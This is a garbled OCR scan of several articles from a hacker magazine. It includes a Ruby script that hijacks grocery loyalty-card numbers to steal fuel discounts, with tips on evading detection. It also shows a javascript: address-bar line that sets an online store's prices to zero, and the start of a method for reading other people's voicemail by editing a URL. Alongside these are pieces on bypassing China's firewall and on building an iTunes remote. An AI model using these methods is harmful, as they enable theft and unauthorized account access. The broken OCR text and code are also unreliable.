Agai n, thi s arti cl e woul d end here for anyone i n order to i ni ti al i ze the sessi on. I f an attempt i s made
wi shi ng to hi jack free gasol i ne. A person wi th to request the poi nts page after sendi ng the POST
adequate programmi ng capabi l i ti es and dubi ous data, the server wi l l respond wi th an error stati ng the
i ntenti ons coul d wri te a program to si mpl y step storenum vari abl e has not been defi ned. Requests
through BCNs and log the amount of poi nts each one for the pages contai ni ng the poi nts i nformati on are
has at the ti me. Then i t is j ust a matter of pri nti ng off made usi ng GET Ishareddev/subcl ub/. Al l the poi nts
the barcode and headi ng out to the gas stati on. As I the customer has for the reward cl ubs the BCN i s
was wri ti ng a program to test thi s theory, I noti ced el i gi bl e for are di spl ayed.
there were some di fferences between the i nforma- Te Code
ti on presented when I logged i n. Some BCNs woul d The code i s wri tten in Ruby because I wanted to
fi rst ask for me to sel ect a preferred store but woul d l earn more about Ruby. I t i s easi l y portabl e to Perl ,
al ways come back wi th a generi c fi rst name, l i ke but I wi l l leave that as an exerci se to the reader. The
j ohn, Betty, Pt, Mary, etc. and woul d al ways have betweenstri ngsO functi on coul d probabl y be si mpl i -
$0. 00 savi ngs thi s year. I assumed these BCNs to fied usi ng regex, but thi s functi on has sered me wel l
be i nval i d or not ever registered. Another response i n the past and I am sti l l l earni ng regex. No error
I was getti ng was a fai l ed l ogi n attempt. I chose not checki ng was bui l t i n to thi s code as i t was desi gned
to i nvestigate thi s any further. The most i nteresti ng to be a proof of concept. The POST and GET stri ngs
response I received was the rare abi l ity to cl i ck a l i nk have been stri pped t o a mi ni mum s o no browser
whi ch read " Update Account." Fol l owi ng thi s l i nk cl oaki ng i s done. I f you put a for l oop around thi s
presented me wi th a weal th of i nformati on. The i nfor- code and gi antpa. com' s thugs ki ck in your door, do
mati on gathered from t hi s new l i nk i ncl uded a pass- not come cryi ng to me. I t onl y works for an account
word (keep i n mi nd, the password to get thi s far was whi ch is el i gi bl e for Gas Reward poi nts and wi l l
ori gi nal l y dummy i nformati on) . The password was i n return an error i f the store l ocator or fai l ed l ogi n
a form whi ch made i t appear as masked characters, si tuati ons occur. Code i s not needed for thi s hack,
but vi ewi ng the source or the ethereal l ogs showed but i t does hel p expl ai n the underl yi ng system,
the password comi ng across the wi re i n pl ai n text. expose its vul nerabi l i ti es, and si mpl ify the overal l
Huge Mi stake Number . . . a l ot. . . Never send users' demonstrati on.
thei r passwords, ever. I nstead, make t hem confi rm Te Risks
the ol d password fi rst i f they want to change it, or I i denti fied several ri sks throughout worki ng on
i mpl ement a password reset pol i cy whi ch emai l s thi s project. Fi rst, dumpster di vi ng has al l of i ts ri sks
the user thei r password. Anal yzi ng the html of the of bei ng caught associ ated wi th i t. Thi s may not be a
di fferent responses al so ki cked up a h i dden pi ece of ri sk, but more of an ethi cal choi ce to make. Fol l owi ng
i nformati on: the preferred store number of the owner through on thi s method essenti al l y steal s the poi nts
of the BCN. Usi ng the Store Locator page, one easi l y earned by someone el se. Dur i ng t he i ni ti al course of
matches store numbers to store addresses. I bel i eve probi ng the websi te, I caused errors to be generated.
the creators of the BonusCard program were t hi nki ng These errors reported my I P address. Taggi ng the
Winter 2006-2007Pge 55
server wi th several thousand requests to l ogi n may
di sturb the sl eepi ng IT securi ty guard. Afer pri nti ng
of a bar code to try, there are ri sks associ ated wi th
actual procurement of the free gas. These gas stati ons
typi cal l y have a booth where a person si ts to col l ect
cash. Most of the ti me I see thi s person readi ng a
book and suspect exi ti ng the booth is not permi tted.
Al most any gas stati on wi l l empl oy the use of secu
ri ty cameras, but agai n, thi s ri sk i s mi ni mi zed by the
response time to the i nci dent. Retenti on ti me of the
vi deo i s l i kel y to be short whi l e the chai n of events
l eadi ng to request to vi ew the vi deos wi l l take l onger.
Fi rst, the shopper whose BCN was hi j acked must
compl ai n when they noti ce the probl em. Th i s may be
shortl y after payi ng for the gas at ful l pri ce. I t i s very
di fi cul t to moti vate a company whi ch has al ready
been pai d. So the shopper compl ai ns to the atten
dant. The attendant hai l s a shi ft manager. The shift
manager is perpl exed and hai l s a store manager. At
thi s poi nt, the compl ai ni ng customer wi l l have prob
ably been appeased. Assumi ng an i sol ated i nci dent,
i t i s l i kel y the i nvesti gati on wi l l stop here. Otherwi se,
i t i s probabl y up to the store manager to make the
connecti on that accounts are bei ng hi j acked. I am
pretty sure that getti ng caught i s l egal l y bi ndi ng ( al l
sorts of puns i ntended o n that one).
Does It Work?
After i denti fyi ng a l ot of the ri sks, I deci ded to
test the method usi ng my own BCN. I si mpl y ran my
BCN through my program, determi ned the amount
of di scount, pri nted the bar code, and headed out
GasJaek . rb
require ' socket '
to the gas stati on. I was rewarded wi th the di scount
I was enti tl ed to whi l e retai ni ng the abi l i ty to sl eep
peaceful l y at ni ght.
Further Investigations
I did not go after the underl yi ng database of the
BonusCard system. I am sure with the lack of secu
ri ty observed, the si te i s vul nerabl e to database query
i nj ecti on and XSS attacks. The server is runni ng Col d
Fusi on and one error message I recei ved was nonde
scri pt. I googl ed i t and turned up i nformati on about
Col d Fusi on runni ng on 115. Agai n, none of thi s was
rel evant to the project, so the detai l s may be fuzzy.
I di d not l oop through massi ve amounts of BCNs to
determi ne di ferent account types. I merel y sampl ed
a few parti ci pati ng fri ends' BCNs and may have acci
dental l y mi styped a few whi ch l ead to the i denti fi ca
ti on of the di ferent account types. Fai l ed l ogi ns were
not i nvesti gated as to why they fai l ed, j ust that they
were consi stentl y comi ng up as fai l ed. Store l ocator
l ogi ns were al so not further i nvestigated. Update
abl e accounts were extremel y rare, and any found
were the same. I suspect these were test accounts.
The database contai ned the fi rst name of the BCN
owner and i t i s reasonabl e to assume i t contai ns al l
the i nformati on on the BonusCard appl i cati on form. I
am very much sti l l i nterested in the Gi ant BonusCard
system and al l the fun i t can provi de.
Shouts to milkman for his ruby help and to
LV2600. com for putting up with me.
def betweenstrings ( searehtext , startstring, endstring , starti ndex )
searehtextlength " searehtext . length
startstringlength " startstring . length
endstringlength = endstring . length
if searehtextlength 0 or startstringlength " " 0 or endstringlength 0
return " "
else
if searehtextlength - ( startstringlength + endstringlength ) <= 0
return
tt u
else
startstringindex " searehtext . index ( startstring , startindex )
if startstringindex " " nil then
return
tt tr
else
endstringindex " searehtext . index ( endstring , startstringindex + startstringlength )
if endstringindex "" nil
return " "
else
betweenstringslength " endstringindex - ( startstringindex + startstringlength )
return searehtext [ startstringindex + startstringlength , betweenstringslength )
end
end
end
end
end
puts " Enter 11 digit BonusCard number"
ben " gets
sek " TCPSoeket . new( ' w. giantpa . eom' , ' w' )
post string = " POST / shareddev/Giant register/ login aetion . html HTTP/ I . I \ nContent-Type :
applieation/x-w-form-urleneoded\ nHost : w. giantpa . eom\
Pge 56 2600 Magazine
( nco:t,n1-jergtn : 6 3 \ nCookie : JSESSIONID= " +bcn+ " \ n\ n " + " F
Username=a&F Password=a&F BonusCard= " +bcn+" &Login=Sign+ln\
-
n "
sck . print post_string
-
answer
-
post sck . gets ( nil )
sck . close
location302 = betweenstrings ( answer-post . " location : http : / /ww. giantpa . com .. . .. \ n " . O )
location3 02 . chop !
get3 02_string = " GET " +location302+" HTTP/ I . 1 \ nHost : w.
giantpa . com\ nCookie : JSESSIONID=" +bcn+ " \ n\ n "
sck = TCPSocket . new( ' w. giantpa . com' . ' w' )
sck . print get302_string
answer_get3 02 = sck . gets ( nil )
sck . close
sck = TCPSocket . new( ' w. giantpa . com' . ' w' )
getpoints string = " GET / shareddev/ subclub/ HTTP/ I . 1 \ nHost : w.
giantpa . com\ nCookie : JSESSIONID=" +bcn+ " \ n\ n"
sck . print getpoints_string
answer_getpoints sck . gets ( nil )
sck . close
gaspoints = answer getpoints [ /You have \ d* Gas Extra Rewards points / ]
gaspoints = betweenstrings ( gaspoints . " YoU have .. . .. Gas Extra Rewards points " . O )
puts gas points
by Kcahon
so that i t cou l d pl ay a song, ski p to the next song,
About a year ago Motorol a put out a product
and do a whol e uni verse of functi ons? Al l wi rel essl y?
cal l ed the I Mfree. I t was a wi rel ess i nstant messenger
I t was wi thi n my grasp. The fol l owi ng are i nstructi ons
that connected to a base stati on on a regu l ar Pc.
are on how to set up your I Mfree to i nteract wi re-
The stati on communi cated wi th the devi ce over
l ess l y wi th i Tunes. Note that these commands coul d
radi o frequenci es, whi ch gave i t a range of about 50
al so be sent vi a a cel l phone or any ot her mobi l e
yards. At t he t i me i t l ooked l i ke a good buy and I
devi ce. The poss i bi l i ti es are enormous. Thi s tutori al i s
purchased i t for $ 1 00. I qui ckl y real i zed t hat I had
meti cul ous and i s i ntended to make sure that al l of i t
l i ttl e use for i t, as I had access to a machi ne wi th AI M
wi l l work properl y. I f i t seems l i ke novi ce mater i al at
on i t anyway. Many peopl e must have fel t the same
t i mes, I apol ogi ze. The resul t i s wel l worth the effort.
way and the pri ce pl ummeted to around $30. I t sat
1 . Create two AI M screen names. I f you al ready
around for awhi l e unt i l I had an epi phany. Wou l dn' t
have two that i s perfectl y fi ne. Desi gnate one t o be
t hi s make a perfect i Tunes remote?
the recei ver on the host PC and one to be l ogged i n
Several peopl e were al ready hacki ng i t and I
on the I Mfree.
found some message boards that were dedi cated to 2. Go to http: //maxi mi zed. com/downl oad/free
i ts devel opment. One such forum, http://tekni k i l l .
.ware/scri ptsfori tunes/setup. exe t o downl oad the
"netlbbs/, was especi al l y enl i ghteni ng. Thi s si te had
i Tunes scri pts that wi l l be executed remotel y t hrough
appeared on Hackaday. com and I woul d occasi on-
AI M. Si nce the ori gi nal Wi namp pl an needed a
al l y check i n to see what was goi ng on. There awai ted
command l i ne i nterface, I fi gured out that these
me the th read " i mfree and wi namp" whi ch had been
scri pts cou l d be executed as wel l to control i Tunes.
posted by a user named Jason. I n there i t descri bed
The scri pts were wri tten i n VB and are automati cal l y
an i ngeni ous way of havi ng the I Mfree communi cate
i nstal l ed in the i Tunes di rectory with an exe fi l e.
wi th Wi namp. The "event" feature i n Tri l l i an Pro (a 3. Downl oad and i nstal l the Tri l l i an software.
popul ar 1 M cl i ent) enabl es a program or acti on to be
Get a 1 5 day tri al to test out the advanced functi ons
executed from any screen name remotel y wi th j ust a
that are needed in t hi s test. Go to Tri l l i an, Upgrade
pl ai ntext message. Th i s set off fi reworks in my mi nd.
t o Tri l l i an Pro, and equest an Eval uati on Versi on.
The next day I opened up i Tunes and i t hi t me.
Logi n wi th the password gi ven t hrough the emai l and
Mi l l i ons of peopl e use i Tunes and rel y on i t for musi c.
reboot Tri l l i an.
Wou l d I be abl e t o i ntegrate t he I Mfree wi t h i Tunes 4. Launch Tri l l i an Pro and go t o Tri l l i an, Tri l l i an
Winter 2006-2007P
g
e 57
and cl i ck on Pl ugi ns. Cl i ck on AI M!
I CQ and go to Tri l l i an Preferences agai n and on the
ri ght hand si de cl i ck on Add a New 1 M Connecti on.
Confi gure al l of your l ogi n i nformati on for the AI M
screen name that wi l l be recei vi ng the data from
the I Mfree. logi n with thi s screen name on Tri l l i an.
For further expl anati on l ater on, my fi cti ti ous screen
name wi l l be cal l ed I tunesRemote.
5. Now for the fun stuff. I must gi ve credi t to Jason
over at www.tekni ki l l . netbbsl for gi vi ng me the i dea
and the foundati on for the rest of thi s arti cl e. Hi s
i nstructi ons worked when I tri ed them, so I am onl y
adapti ng them a bi t t o match our i Tunes experi ment
cri teri a.
6. Go to Tri l l i an -} Tri l l i an Preferences and then
cl i ck on Advanced Preferences.
7. Cl i ck on Automati on i n the l eft hand menu.
8. Cl i ck Add - } Word Matchi ng.
9. I n the Add Word Match Entry box enter the
word "' l aunch" i n the word text box, check Match
Whol e Word and check Generate Event, then enter
somethi ng for the event type (j ust use " l aunch"
agai n) .
1 O. Cl i ck on Add Event.
1 1 . Next to Acti on Type change Sound to Execute
Program. (You probabl y see where thi s is l eadi ng to
by now. If not, keep readi ng anyway.)
1 2. Browse to the l ocati on of your i Tunes exe fi l e
and sel ect i t as the program that you wi sh to execute.
I t wi l l most l i kel y be i n "C: \ Program Fi l es\ i Tunes".
Cl i ck Set Event.
1 3. Thi s wi l l take you back to the Match Word
Entry menu. Make sure that everythi ng i s ri ght and
that the word i s " l aunch" . Al so make sure that the
entry type i s cal l ed " l aunch" . Cl i ck Save.
I t' s now ti me to cook the shi sh kabob. Logi n wi th
your I Mfree screen name and 1 M your other screen
name ( l tunesRemote) with j ust the word " l aunch" .
Voi l a, i Tunes l aunches ! I f your fi rewal l i s bl ocki ng
i Tunes from l aunchi ng, j ust check Remember Thi s
Setti ng and Al l ow i f you run on Zoneal arm. Do l i ke
wi se i f you have a di fferent fi rewal l . Al l that you need
to do to pl ay a song, ski p a song, etc. is to repeat
steps 6-1 3 by repl aci ng the l ocati on of the i Tunes exe
fi l e with one of the i Tunes scri pts that was i nstal l ed
ori gi nal l y. For i nstance, i f you wanted to pl ay a song
you woul d have Tri l l i an execute the scri pt cal l ed Pl ay
in C: \ Program Fi l es\ i Tu nes\ Scri pts, if that ' s where
you put it. Al so, remember to type in the word that
Tri l l i an wi l l match wi th the program as Pl ay, so that
when you send the message of Pl ay to ItunesRemote,
i t wi l l execute the scri pt and pl ay the song.
Tri l l i an Pro does not seem to have a l i mi t on the
number of commands that i t can execute on the host
Pc. I have about five commands runni ng, i ncl udi ng
the abi l i ty to change the vol ume, al l on my I Mfree.
The possi bi l i ti es for thi s appl i cati on are l i mi tl ess.
Any appl i cati on or program for that matter can be
l aunched or executed hal f a world away with a cel l
phone. The onl y setback is that Tri l l i an Pro has a pri ce
tag of $25 . At l east test i t out wi th the tri al versi on and
prepare to be amazed. The I Mfree can be bought on
eBay for about $ 1 0 and on Amazon for $30, maki ng
thi s wi rel ess i Tunes remote cost between $35-$55.
I magi ne queuei ng up t he song " I ' l l Be Home For
Chri stmas" on your PC in Ameri ca whi l e si tti ng i n
t he Tokyo ai rport wi th nothi ng but your cel l phone.
Pl ease, l et the i magi nati on run wi l d.

by Tokachu works and how to keep i t from rui ni ng your I nternet.
tokachu@gmai l.com How It Works
When most peopl e t hi nk of I nternet censorshi p, Unl i ke most other countri es that si mpl y bl ock al l
they tend t o t hi nk about Chi na t he most. Whi l e many
TCP traffic or uti l i ze a fi l teri ng HTTP proxy, Chi na
other countri es have some sort of state-control l ed
rel i es al most sol el y on speci al routers desi gned
I nternet pol i cy, most peopl e wou l d refer to Chi na
t o censor based on raw TCP data i nstead of HTTP
because of the sheer si ze of the popul ati on and
requests. The government of Chi na rel i es on two
government. I roni cal l y enough, the country wi th one
mai n methods of censorshi p: fl oodi ng fake DNS
of t he l argest I nternet popul ati ons seemed t o go for
the l owest bi dder when i t came to I nternet censor-
requests and forgi ng TCP connecti on resets.
DNS Poisoni ng
shi p devi ces, repl aci ng qual ity control wi th franti c
devel opers pressed for ti me.
Very few domai n names are actual l y " bl ocked"
No matter how strange that may be, i t sti l l does
usi ng thi s method. For a DNS poi son to take pl ace,
not j usti fy a government which wants to keep fu l l
there must be a request for a very, very, very naughty
control over a l l medi a. Whi ch is why I ' l l tel l you, and
websi te ( l i ke mi nghui . org) pl aced. Thi s keeps anyone
hopeful l y a Chi nese fri end, how the " Great" fi rewal l
from fi guri ng out how to connect to, l et al one down-
P
g
e 58 2600 Ma
g
azine
l oad content from, a forbi dden host.
Here' s how an uncensored DNS request woul d
l ook l i ke i n Chi na:
0 . 000000 1 9 2 . 1 6 8 . 1 . 2 -> 2 2 0 . 1 94 . 5 9 . 1 7
DNS Standard query A baidu . com
0 . 2 8 9 8 1 7 2 2 0 . 1 94 . 59 . 1 7 -> 1 9 2 . 1 6 8 . 1 . 2
DNS Standard query response A
2 02 . 1 0 8 . 2 2 . 3 3 A 2 2 0 . 1 8 1 . 1 8 . 1 1 4
And here' s how i t woul d l ook i f a domai n were
censored:
0 . 000000 1 9 2 . 1 6 8 . 1 . 2 -> 2 2 0 . 1 9 4 . 5 9 . 1 7 DNS
Standard query A minghui . org 0 . 2 8 8 9 6 3
2 2 0 . 1 9 4 . 59 . 1 7 -> 1 9 2 . 1 6 8 . 1 . 2 DNS Standard
query response A 2 03 . 1 05 . 1 . 2 1 0 . 2 8 9 4 8 2
2 2 0 . 1 9 4 . 59 . 1 7 -> 1 9 2 . 1 6 8 . 1 . 2 DNS Standard
query response A 2 03 . 1 05 . 1 . 2 1 0 . 2 8 9 8 3 8
2 2 0 . 1 9 4 . 5 9 . 1 7 - > 1 9 2 . 1 6 8 . 1 . 2 DNS Standard
query response A 2 0 3 . 1 05 . 1 . 2 1 0 . 2 9 0 3 7 4
2 2 0 . 1 9 4 . 5 9 . 1 7 -> 1 9 2 . 1 6 8 . 1 . 2 DNS Standard
query response A 2 0 3 . 1 05 . 1 . 2 1 0 . 2 9 0 7 3 2
2 2 0 . 19 4 . 59 . 1 7 -> 1 9 2 . 1 6 8 . 1 . 2 DNS Standard
query response A 2 0 3 . 1 05 . 1 . 2 1 0 . 2 9 0 7 5 7
1 9 2 . 1 6 8 . 1 . 2 - > 2 2 0 . 1 9 4 . 5 9 . 1 7 ICMP
Destination unreachable ( Port unreachable )
0 . 2 9 1 3 1 1 2 2 0 . 1 94 . 5 9 . 1 7 -> 1 9 2 . 1 6 8 . 1 . 2 DNS
Standard query response A 1 6 9 . 1 3 2 . 1 3 . 1 0 3
0 . 2 9 1 3 3 7 1 9 2 . 1 6 8 . 1 . 2 -> 2 2 0 . 1 9 4 . 5 9 . 1 7 ICMP
Destination unreachable ( Port unreachable )
The real repl y never gets through because the
router forges nearl y a hal f dozen fake DNS repl i es,
al ong with a few random I CMP messages, to whoever
requests a "forbi dden" website. Thi s fi l ter onl y works
on UDP port 53 ( DNS), whi ch woul d theoreti cal l y
make uncensored DNS requests possi bl e i f a suffi
ci ent number of DNS servers runni ng on ports other
than 53 exi sted.
You can tel l if your packets are goi ng through a
Chi nese router by one si mpl e test. Try performi ng
a DNS query to a remote machi ne i n Chi na. I f i t
doesn' t go through, try performi ng a DNS query
for " mi nghui . org" on the same machi ne. If you get
seemi ngl y random responses, you ' re routi ng through
Chi na. I f you want to determi ne whi ch router i s
responsi bl e for the censorshi p, run a traceroute and
perform DNS requests on each hop, starti ng at the
cl osest. When you get the fake DNS repl i es, you ' ve
found the offendi ng router.
Forgi ng Tep Resets
I f a TCP connecti on i s made from or to H
computer in Chi na, the packet data is checked for any
"forbi dden" words. I f the data contai ns any of those
words, the router forges a TCP RST ( reset connecti on)
packet. Th i s al so tri ggers a temporary bl ock on TCP
connecti ons between those two speci fi c computers.
Thi s makes i t appear that the server has gone down
temporar i l y.
The l i st of words not permi tted to be used are
encoded in GB23 1 2 format, whi ch ensures that busi
nesses wi t h websi tes i n Chi na wi l l not be abl e to
send any i l l egal content to computers in Chi na ( si nce
GB23 1 2 i s a character set requi red to be supported
by al l appl i cati ons in Chi na) . The fi l ter works thusl y:
I f the word can be written i n pure ASCI I , l ook for
the word in any mi xture of l owercase and uppercase
ASCI I l etters .
Winter 2006-2007
I f the word must be wri tten i n any combi nati on O
CJ K i deographs, l ook for the byte sequence in ei ther
raw or URl-encoded GB23 1 2 . Hexadeci mal str i ngs
are al so case- i nsensi ti ve.
Problems
Nearl y al l the probl ems of Chi na' s fi rewal l s stem
from one probl em with the routers: they al l perform
statel ess packet i nspecti on. I t doesn' t matter what
protocol the packets are usi ng, nor what computer a
packet comes from. Al l the router is concerned wi th
i s fi ndi ng packets and forgi ng responses, not drop
pi ng content.
Unfortunatel y, that fl aw puts the router owners
and admi ns at an extreme di sadvantage. Anybody
can do a Googl e search for packet-forgi ng sofware
or l i brari es (such as l i bpcap) and whi p up a scri pt
to flood Chi nese routers wi th fake packets - and the
routers wi l l respond, no matter what. I t woul dn' t be
di ffi cul t to set up a botnet wi th DNS request forgers
that can send bi l l i ons of fake DNS requests to vari ous
routers, and i n return have the vi cti m thi nk Chi na i s
attacki ng hi s or her server! I t' s al so possi bl e t o forge
a TCP data packet wi th fake source and desti nati on
addresses, whi ch means that i f you happened to
know the I P addresses of two i mportant di pl omats,
you coul d easi l y cut off thei r abi l i ty to communi cate.
Popul ar Chi nese websi tes are j ust as vul nerabl e too;
emai l systems cou l d be cut off for hours at a ti me.
The

ossi bi l i ti es are endl ess. The TCP RST ti mer may

be fai r l y short, but keep in mi nd that i t onl y takes one
fake packet to cl ose a connecti on.
Getting Around I t
Te Tep Stack. One way t o tel l fake RST packets
from real RST packets i s to l ook at the ti me-to- l i ve
(TIL) parameter. Forged packets wi l l al ways have
hi gher TIls than the real ones. Getti ng around
thi s, however, woul d requi re that both parti es have
a stateful TTL compari son fi l ter at the kernel l evel .
That ' s no good.
You coul d, however, rewri te a TCP-based appl i
cati on t o send "forbi dden" words by usi ng t he TCP
urgent fl ag ( URG) . Thi s onl y requi res that both parti es
have a modi fied appl i cati on - no kernel tweaki ng
necessary. A great exampl e of a program t hat sends
data l i ke that i s a proof-of-concept C program cal l ed
"covertsessi on" (search for i t on Pcket Storm Secu
ri ty). I t can bypass most stateful packet i nspectors,
so i t eas i l y gets around the statel ess i nspectors i n
Chi na. Thi s i s probabl y the best way t o modi fy
i nstant messagi ng (such as QQ) and I RC appl i ca
ti ons, assumi ng one coul dn' t j ust use encrypti on on
both ends.
HTTP Traffic. There' s nothi ng real l y speci al about
how the fi rewa l l treats HTIP traffi c. Mi nd you that i t
onl y l ooks for certai n stri ngs, no matter where they
are. But noti ce how I said i t onl y uses the GB23 1 2
character set: there' s nothi ng stoppi ng us from
si mpl y usi ng UTF-8 i nstead. You can "swi tch" your
websi tes from GB23 1 2 to UTF-8 by si mpl y r unni ng
t hem through i conv. I t' s i mpossi bl e for any UTF-8
sequence to match a GB23 1 2 sequence, even by
Pa
g
e 59
acci dent, so you' re parti al l y assured good exposure
(for a peri od of ti me) .
Most Chi na-based web hosts, such as Bai du and
Yahoo! Chi na, rel y on the fi rewal l s to bl ock some
content for them. Googl e Chi na, however, i s the
one huge excepti on. Googl e' s Chi nese servers are
l ocated in the Uni ted States and thei r censorshi p i s
done enti rel y i n- house. What does that mean? For
one, we don ' t need to worry about text bei ng sent
in GB23 1 2 format (Googl e i nsi sts on usi ng UTF-
8). We can al so expl oi t a "feature" i n Googl e' s text
engi ne that was overl ooked dur i ng the Googl e Chi na
devel opment.
Googl e doesn ' t compare stri ngs i n thei r text engi ne
l i ke most of us do. I nstead of si mpl y compari ng bytes,
Googl e consi ders some words and characters equal
to other words and characters that woul dn' t match
wi th a byte compari son al gori t hm. The character
equal i ty i s what we want to look at here: mai nl y, how
Googl e consi ders "ful l wi dth" ASCI I characters ( wi de,
fi xed-wi dth characters most l y used in Japanese char
acter sets) equal to thei r ASCI I counterparts. If you
were to search for "computers" usi ng ful l wi dth char
acters, you ' d get the same resui ts as you woul d wi th
a si mpl e ASCI I search ( al though some ads mi ght not
show up) .
Now here' s where t he hack comes i n: Googl e' s
censors don' t l ook for those ful l wi dth characters. So,
i f we were to search Googl e Chi na for "ti ananmen
square" usi ng ful l wi dth characters, the resul ts
wou l dn' t be fi l tered (the connecti on may be reset
from what Googl e sends) . Lucki l y, t hi s tri ck works
for Google I mages - meani ng that i t i sn' t too hard to
get Googl e' s cache of i mages normal l y unfi ndabl e
i n Chi na!
Here' s some sampl e code t o generate ful l wi dth
characters i n a shel l i n Perl (assumi ng you' ve got
Uni code support i n your termi nal ) :
#! /usr/bin/perl -w
# fw. pl - make text W-I-D-
E ( convert ascii to fullwidth )
use encoding " UTF-8 " ;
$input = $AGV[ O ) or die t " need
one argument for text" ) ;
foreach ( split I I , $input ) { print
chr ( OxFEEO + ord ( $ ;
}
## end script
J ust type whatever search term you want, pl ug
i n t he output t o Googl e, and watch once-censored
search resul ts j ust show up!
Conclusion
Censorshi p i sn' t a profitabl e busi ness. I f Chi na
were t o rel ease an honest budget ( and i f peopl e and
corporati ons found out a huge percentage of thei r
GDP was goi ng towards censorshi p and propaganda
i nstead of food and heal th care), Chi na' s economy
woul d col l apse i n a matter of hours. Sadl y, i t i sn' t
j ust Chi nese ci t i zens who bel i eve t he l i es: corpora
ti ons l i ke Ci sco and Google actual l y bel i eve you can
make money by keepi ng i nformati on from peopl e.
The sooner the Chi nese peopl e and thei r government
real i ze thi s, the better.
(There are far too many people to thank - you
know who you are. )
by \ li ndi c8tr
where i nformati on i s so ti ghtl y control l ed that i t i s a
A l i ttl e whi l e back I stumbl ed upon a l i nk to the
capi tal cri me to own a radi o that i s not hardwi red to
forums of the Korean Fri endshi p Associ ati on ( http://
recei ve onl y the si ngl e government-approved stati on.
-www. korea-dpr. com/cgi - bi n/s i mpl eforu m. cgi ) .
That the DPRK cannot permi t thei r own government' s
Natural l y, I thought they needed to hear my opi ni on
publ i c websi te, thei r equi val ent to whi tehouse. gov,
on the pl i ght of the peopl e of North Korea. Unfor-
to be l ocated on a server wi thi n its own borders flows
tunatel y, there is no ohvi ous way of regi steri ng for
natural l y from thi s mi ndset. Cl earl y, North Korea i sn' t
a forum membersh i p wi thout j oi ni ng t hei r cl ub, nor
a pl ace that i s eas i l y targeted hy those who woul d
coul d I di scover any l ess obvi ous means t o gai n
seek to use onl i ne acti vi sm to further the free fl ow of
access.
knowl edge. Th i s i s frustrati ng, because hacti vi sm i s
Not bei ng content to wal k away i n total defeat,
one of the few nonvi ol ent routes we have to bri ng the
I deci ded to exami ne other parts of the si te. After a
fi ght to those who woul d sti fl e l earn i ng and creati vi ty
l i ttl e research, I di scovered that thi s domai n i n fact
both at home and abroad.
houses thp offi ci al websi te of the Democrati c Peopl e' s
Whi l e we can' t pi ck on Dear Leader di rectl y,
Republ i c of Korea. A whoi s search for the korea-dpr.
someone cou l d hypotheti cal l y sti ck it to hi s fan cl ub.
-com domai n shows that t he server i s l ocated i n, of
Us i ng techni ques s i mi l ar to the " Havi ng Fun wi th
a l l pl aces, Spai n.
Cooki es" arti cl e i n 23: 3, a mal i ci ous user can use
Thi s seems counteri nt ui ti ve at fi rst gl ance.
i nl i ne j avascr i pt i n a browser' s address bar to get free
However, t hi s makes perfect sense for a country
stuff courtesy of the Korean Fri endshi p Associ ati on.
Pa
g
e 60 2600 Ma
g
azine
Thi s wi l l requi re the attacker to set up a throwaway
PyPI account or a one-ti me use credi t card. They
woul d al so need a l i ttl e knowl edge of Spani sh. Don' t
worry, a hypotheti cal attacker woul dn' t have to spend
any real money for thi s to work.
The KFA onl i ne store i s l ocated at http:/www.
-korea-dpr. com/catal og2/i ndex. php. Our hypothet
i cal angry acti vi st fi rst shoul d choose someth i ng to
buy, preferabl y somethi ng expensi ve. Then he or she
woul d sel ect the "Buy Now! " opti on, then go on to
the checkout. There, the attacker woul d fi l l out the
i nformati on form. I f they want to actual l y receive the
stuff and not get busted, they woul d probabl y want
to use a P. O. box that can ' t be traced back to them,
si nce most devel oped countri es are sti l l on reason
abl y good terms wi th Spai n, i f not the DPRK. Note
that even i f one sel ects payment in U. S. dol l ars, they
wi l l sti l l be bi l l ed in euros. Hi t conti nue twi ce to use
the same P. O. box you submi tted earl i er for your
shi ppi ng and bi l l i ng addresses.
The hack i s executed on the Order Confi rma-
ti on form, and i t i s a si mpl e one. The websi te uses a
POST to send the pri ce i nfo to PyPI in the form of a
j avascri pt vari abl e. The pri ce of the fist i tem is stored
in the vari abl e document.forms[ 2j . amounC 1 . I f you
purchased other items, they' l l be stored in amount_
2, amounC3, and so on.
Go t o t he address bar and enter t he fol l owi ng:
j avascript : void ( document . forms [ 2 ) . amount
-_1 . value=" O . 0 0 " ) ; alert ( document . forms
-[ 2 ) . amount_l . value )
The al ert box i sn' t stri ctl y necessary, but i t is ni ce
to know that the vari abl e was successful l y changed.
I f you bought more than one item, go through and
repeat for amount_2, amount_3, and so forth as
needed.
Al l that remai ns is to confi rm your order in the
Spani sh l anguage form (WTF?) and presto, free North
Korean stuf. Maybe such a kick in the pocket book
wou l d help the membershi p of the KFA to see the
i rony of runni ng an e-commerce websi te on behal f of
a regi me that woul d shoot its own ci ti zens for usi ng a
computer or, up unti l recentl y, buyi ng thi ngs.
1<7 Ft- ee I for t he ta k i n g I \ 0 i c eFI ;. i 1
by noir
noir.na@gmai l .com
K7. net i s a si te provi di ng free, web-based voi ce
mai l and fax servi ces. I ' l l be speci fi cal l y addressi ng
the voi cemai l servi ce i n thi s arti cl e, but I have no
doubt that the fol l owi ng wi l l appl y to the fax servi ces
as wel l . I figured a free voi cemai l servi ce with no
hooks or hi dden agendas, what ' s the harm in tryi ng?
Thi s arti cl e detai l s exactl y the harm found. And for
the record, I did emai l the company expressi ng my
concerns and wi l l i ngness to hel p, but shocki ngl y I
never heard back from them.
The basi cs of the servi ce are very si mpl e. You si gn
up for your free account, they assi gn you your own
phone number and you can now receive voi cemai l s
from that number ei ther i n your emai l or by l oggi ng
i nto the K7 si te. You have the opti on to ei ther l et
K7 pick a number for you or search to fi nd a vanity
number. When you register, the onl y i nformati on you
have to provi de i s your emai l address, a four di gi t
securi ty code, how you found thei r servi ce, and the
speci fi cs on how you want to recei ve your messages.
Thi s is when I fi rst started questi oni ng thei r securi ty
practi ces. Your pi n must be four di gi ts exactl y and
cannot start wi th a zero. Wi th al l 9000 possi bi l i ti es
thi s provi des, somebody woul d be crazy to thi nk
they coul d have a scri pt brute force an account. No
matter, you ' l l see shortl y that t he strength of t he pi n
doesn' t matter. On t o t he good stuff.
Let ' s head on over to voi cemai l . k7. net to l og i n
and start pl ayi ng. After l oggi ng i n, i f you cl i ck on
Check Your Messages, the URL l ooks somet hi ng l i ke
thi s:
http : / /voicemail . k7 . net/ listen . asp?Phone
-=YOURNUMBER&newSession=true&sOrder=
Now go ahead and del ete your voi cemai l .
k7. net cooki e for thi s sessi on. We certai nl y don' t
want t he si te t o thi nk you ' re tryi ng t o change your
account when you ' re tryi ng to change somebody
el se' s. That coul d be di sastrous. The next step is a
bi t advanced, so hopeful l y I don ' t l ose any readers
wi th its compl exi ty. Change the phone number in the
